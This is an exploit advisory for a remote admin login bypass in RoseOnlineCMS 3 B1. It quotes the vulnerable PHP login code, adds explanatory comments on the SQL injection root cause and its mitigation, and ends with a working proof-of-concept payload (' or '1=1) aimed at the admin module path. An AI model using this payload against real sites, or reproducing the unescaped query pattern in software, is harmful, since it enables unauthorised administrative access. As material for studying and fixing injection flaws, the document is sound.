\#'#/ (-.-) --------------------oOO---(_)---OOo-------------------
|RoseOnlineCMS <= 3 B1 Remote Login Bypass Exploit |
|(works only with magic_quotes_gpc = off)|
------------------------------------------------------
[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Download: http://sourceforge.net/projects/rosecms/files/
[!] Date: 16.01.2010
[!] Remote: yes
[!] Code :

<!-- Admin login form (vulnerable listing quoted by the advisory, kept verbatim).
     The action expression below is a bare PHP statement, not an echo, so it
     prints nothing and the form posts back to the current URL. Had it been
     echoed, the value would need HTML-escaping: PHP_SELF is derived from the
     request path. -->
<form action="<?php $PHP_SELF; ?>" method="post">
<div align="center">
<table width="295" border="0">
<tr>
<td width="64">Username:</td>
<td width="215">
<label>
<input name="user" type="text" id="user">
</label></td>
</tr>
<tr>
<td>Password:</td>
<!-- type="text" rather than type="password": the credential is shown in clear text as typed. -->
<td><input name="pass" type="text" id="pass"></td>
</tr>
</table>
</div>
<p align="center">
<em>
<input name="submit" type="submit" id="submit" value="Login">
</em>
<!-- Note the mis-nesting: </form> closes before the enclosing <p> does. -->
</form>
</p>
<?php
if(isset($_POST['submit'])) {
    // username and password sent from signup form
    //
    // ROOT CAUSE: $USER comes straight from the POST body and is interpolated
    // into the SQL string below with no escaping and no parameter binding, so a
    // quote character in the username changes the structure of the WHERE clause
    // (this is what the PoC at the bottom of the advisory exercises). The header
    // says the bypass needs magic_quotes_gpc = off because, when on, that setting
    // backslash-escaped quotes in $_POST; it was never a real defence and was
    // removed in PHP 5.4.
    $USER = $_POST['user'];
    // Unsalted MD5 is not a password hash; password_hash()/password_verify()
    // would be the modern replacement.
    $PASS = md5($_POST['pass']);
    // MITIGATION: use a prepared statement with bound parameters (mysqli or PDO),
    // e.g. "SELECT * FROM accounts WHERE username = ? AND password = ? AND accesslevel = '300'".
    // The <code> tags around the table name look like a rendering artifact of
    // MySQL backtick quoting in the original source — presumably `accounts`.
    $sql = "SELECT * FROM <code>accounts</code> WHERE username='$USER' and password='$PASS' and accesslevel = '300'";
    // mysql_* is the legacy extension (deprecated in PHP 5.5, removed in 7.0);
    // its return value is not checked, so a failed query falls into the else branch.
    $result = mysql_query($sql);
    // Mysql_num_row is counting table row
    $count = mysql_num_rows($result);
    // If result matched $myusername and $mypassword, table row must be 1 row
    if($count == 1){
        // Register $user, $pass and redirect to file ?op=admin
        //
        // session_register() stores the *global* variables named "USER"/"PASS"
        // in the session (register_globals-era API, removed in PHP 5.4). The raw
        // submitted username — not a verified account row — is what later pages
        // presumably trust as the logged-in identity; those pages are not shown here.
        session_register("USER");
        session_register("PASS");
        echo('Logged in: <a href=?op=admincp>Click here</a> to go to the control panel.');
    }
    else {
        echo "You are banned, or you are an user with no permission to enter.";
    }
}
?>

[!] PoC: [RoseOnlineCMS_path]/modules/admin.php
username : ' or '1=1
password : cr4wl3r |